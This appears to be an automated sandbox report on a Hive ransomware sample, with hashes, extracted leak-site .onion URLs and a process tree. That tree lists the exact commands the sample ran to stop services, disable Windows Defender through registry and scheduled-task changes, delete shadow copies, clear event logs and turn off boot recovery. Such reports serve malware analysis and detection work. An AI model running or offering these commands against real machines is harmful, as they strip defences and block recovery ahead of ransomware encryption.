Analysis
- max time kernel: 111s
- max time network: 19s
- platform: windows7_x64
- resource: win7-en-20211208
- submitted: 12-01-2022 16:51
- Static task: static1
- Behavioral task: behavioral1
  Sample: ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe
  Resource: win7-en-20211208
- Behavioral task: behavioral2
  Sample: ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe
  Resource: win10-en-20211208
General
- Target: ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe
- Size: 2.6MB
- MD5: ca7878f1271bb808e628f7ebb84bcc1f
- SHA1: 8f7713d0519be5c75453b3028ff7baa564fe84c1
- SHA256: ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216
- SHA512: 58bf1728467eb32d94be1be4e70d3ca97e0eb21d9fd375d5e567a908ce4a5a2473e4e6e0ebecb57152a4fb6eec137d1a3e843a45cd0eabc1d55f704e42c3a3f4
Malware Config
- Extracted from: C:\Program Files\7-Zip\vyS2_HOW_TO_DECRYPT.txt
- Family: hive
- URLs:
  http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
  http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
- Deletes Windows Defender Definitions (2 TTPs, 1 IoC)
  Uses mpcmdrun utility to delete all AV definitions.
  Processes: MpCmdRun.exe (PID 1064)
- Hive
  A ransomware written in Golang first seen in June 2021.
- Modifies security service (2 TTPs, 1 IoC)
  Processes: reg.exe
    Set value (int): \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"
- Clears Windows event logs (1 TTP)
- Deletes shadow copies (2 TTPs)
  Ransomware often targets backup files to inhibit system recovery.
- Modifies boot configuration data using bcdedit (1 TTP, 2 IoCs)
  Processes: bcdedit.exe (PID 660), bcdedit.exe (PID 1468)
- Modifies extensions of user files (2 IoCs)
  Ransomware generally changes the extension on encrypted files.
  Processes: ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe
    File renamed: C:\Users\Admin\Pictures\RepairEdit.tif => C:\Users\Admin\Pictures\RepairEdit.tif.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_EhNcjUAuLdM0.8zvpm
    File opened for modification: C:\Users\Admin\Pictures\RepairEdit.tif.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_EhNcjUAuLdM0.8zvpm
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Drops file in Program Files directory (64 IoCs)
  Processes: ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe
- Launches sc.exe
  Sc.exe is a Windows utility to control services on the system.
- Interacts with shadow copies (2 TTPs, 1 IoC)
  Shadow copies are often targeted by ransomware to inhibit system recovery.
  Processes: vssadmin.exe (PID 1324)
- Opens file in notepad (likely ransom note) (1 IoC)
  Processes: notepad.exe (PID 2336)
- Runs net.exe
- Runs ping.exe (1 TTP, 1 IoC)
- Suspicious behavior: EnumeratesProcesses (3 IoCs)
  Processes: powershell.exe (PID 1156), powershell.exe (PID 1064), ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe (PID 1400)
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Processes: wevtutil.exe, wevtutil.exe, wevtutil.exe, wmic.exe, wmic.exe
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes: ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe, net.exe (listed 8 times)
Processes
- C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe (PID 1400)
  Command line: "C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe"
  Signatures: Modifies extensions of user files; Drops file in Program Files directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe (PID 2036)
    Command line: net.exe stop "NetMsmqActivator" /y
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 1160)
      Command line: C:\Windows\system32\net1 stop "NetMsmqActivator" /y
  - C:\Windows\system32\net.exe (PID 696)
    Command line: net.exe stop "SamSs" /y
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 1224)
      Command line: C:\Windows\system32\net1 stop "SamSs" /y
  - C:\Windows\system32\net.exe (PID 1252)
    Command line: net.exe stop "SDRSVC" /y
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 764)
      Command line: C:\Windows\system32\net1 stop "SDRSVC" /y
  - C:\Windows\system32\net.exe (PID 816)
    Command line: net.exe stop "SstpSvc" /y
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 1544)
      Command line: C:\Windows\system32\net1 stop "SstpSvc" /y
  - C:\Windows\system32\net.exe (PID 1952)
    Command line: net.exe stop "UI0Detect" /y
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 740)
      Command line: C:\Windows\system32\net1 stop "UI0Detect" /y
  - C:\Windows\system32\net.exe (PID 956)
    Command line: net.exe stop "VSS" /y
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 960)
      Command line: C:\Windows\system32\net1 stop "VSS" /y
  - C:\Windows\system32\net.exe (PID 1404)
    Command line: net.exe stop "wbengine" /y
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 1560)
      Command line: C:\Windows\system32\net1 stop "wbengine" /y
  - C:\Windows\system32\net.exe (PID 1804)
    Command line: net.exe stop "WebClient" /y
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 1168)
      Command line: C:\Windows\system32\net1 stop "WebClient" /y
  - C:\Windows\system32\sc.exe (PID 992)
    Command line: sc.exe config "NetMsmqActivator" start= disabled
  - C:\Windows\system32\sc.exe (PID 952)
    Command line: sc.exe config "SamSs" start= disabled
  - C:\Windows\system32\sc.exe (PID 1776)
    Command line: sc.exe config "SDRSVC" start= disabled
  - C:\Windows\system32\sc.exe (PID 1956)
    Command line: sc.exe config "SstpSvc" start= disabled
  - C:\Windows\system32\sc.exe (PID 1704)
    Command line: sc.exe config "UI0Detect" start= disabled
  - C:\Windows\system32\sc.exe (PID 1352)
    Command line: sc.exe config "VSS" start= disabled
  - C:\Windows\system32\sc.exe (PID 1192)
    Command line: sc.exe config "wbengine" start= disabled
  - C:\Windows\system32\sc.exe (PID 916)
    Command line: sc.exe config "WebClient" start= disabled
  - C:\Windows\system32\reg.exe (PID 1732)
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  - C:\Windows\system32\reg.exe (PID 1584)
    Command line: reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
  - C:\Windows\system32\reg.exe (PID 532)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  - C:\Windows\system32\reg.exe (PID 1160)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
  - C:\Windows\system32\reg.exe (PID 1372)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
  - C:\Windows\system32\reg.exe (PID 1832)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  - C:\Windows\system32\reg.exe (PID 1100)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
  - C:\Windows\system32\reg.exe (PID 1460)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  - C:\Windows\system32\reg.exe (PID 736)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
  - C:\Windows\system32\reg.exe (PID 1040)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  - C:\Windows\system32\reg.exe (PID 1836)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
  - C:\Windows\system32\reg.exe (PID 1104)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
  - C:\Windows\system32\reg.exe (PID 1624)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
  - C:\Windows\system32\reg.exe (PID 1772)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
  - C:\Windows\system32\reg.exe (PID 1920)
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
  - C:\Windows\system32\reg.exe (PID 1380)
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
  - C:\Windows\system32\schtasks.exe (PID 1900)
    Command line: schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
  - C:\Windows\system32\schtasks.exe (PID 892)
    Command line: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
  - C:\Windows\system32\schtasks.exe (PID 1604)
    Command line: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
  - C:\Windows\system32\schtasks.exe (PID 1384)
    Command line: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
  - C:\Windows\system32\schtasks.exe (PID 1652)
    Command line: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
  - C:\Windows\system32\reg.exe (PID 680)
    Command line: reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
  - C:\Windows\system32\reg.exe (PID 728)
    Command line: reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
  - C:\Windows\system32\reg.exe (PID 1588)
    Command line: reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
  - C:\Windows\system32\reg.exe (PID 2044)
    Command line: reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
  - C:\Windows\system32\reg.exe (PID 1284)
    Command line: reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
  - C:\Windows\system32\reg.exe (PID 2000)
    Command line: reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
  - C:\Windows\system32\reg.exe (PID 776)
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
  - C:\Windows\system32\reg.exe (PID 1312)
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
  - C:\Windows\system32\reg.exe (PID 1716)
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
  - C:\Windows\system32\reg.exe (PID 1608)
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
  - C:\Windows\system32\reg.exe (PID 520)
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
    Signatures: Modifies security service
  - C:\Windows\system32\reg.exe (PID 1572)
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  - C:\Windows\system32\vssadmin.exe (PID 1324)
    Command line: vssadmin.exe delete shadows /all /quiet
    Signatures: Interacts with shadow copies
  - C:\Windows\system32\wevtutil.exe (PID 1708)
    Command line: wevtutil.exe cl system
    Signatures: Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\wevtutil.exe
    Command line: wevtutil.exe cl security
- Suspicious use of AdjustPrivilegeToken
PID:884 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1612 -
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1476 -
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:972 -
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:660 -
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:1468 -
C:\Windows\system32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:1560
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:1064 -
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:1048
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1156 -
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:1092
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1064 -
C:\Windows\system32\notepad.exenotepad.exe C:\vyS2_HOW_TO_DECRYPT.txt2⤵
- Opens file in notepad (likely ransom note)
PID:2336 -
C:\Windows\system32\cmd.execmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe"2⤵PID:2344
-
C:\Windows\system32\PING.EXEping.exe -n 5 127.0.0.13⤵
- Runs ping.exe
PID:2368
Network
MITRE ATT&CK Enterprise v6
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5 0b3d25fb685158a43d4a56861a448756
SHA1 1eb3e477363f853566f5086128a369f25862aa3a
SHA256 23b030291621f64706be3337f51b643ce70b8f7b3adeb39e9850d6449510f303
SHA512 d3abc5607676f125fed3d0b4325606c32afed05196af2064734245736e065e966493f307e25e4f6be7fcc1684423e12f4864ef32dcdbcc442aaba357dcbdb670
-
MD5 ee121b1deb962e44600cf271791ebd82
SHA1 1c5b22c8856b15843ac236159b558e1fdca8dc04
SHA256 34ed6223e7de680957e45d9fbf0117506a2820990380a279a1272465f49ee811
SHA512 f5136d2bd9e539af874aff551b600d760b3867ad88c250fafe5a2e1f10eb0a673a115710d43074649ede4f5c6401be3aa7fdce70fd4c777a8aa7ebb83af31d4a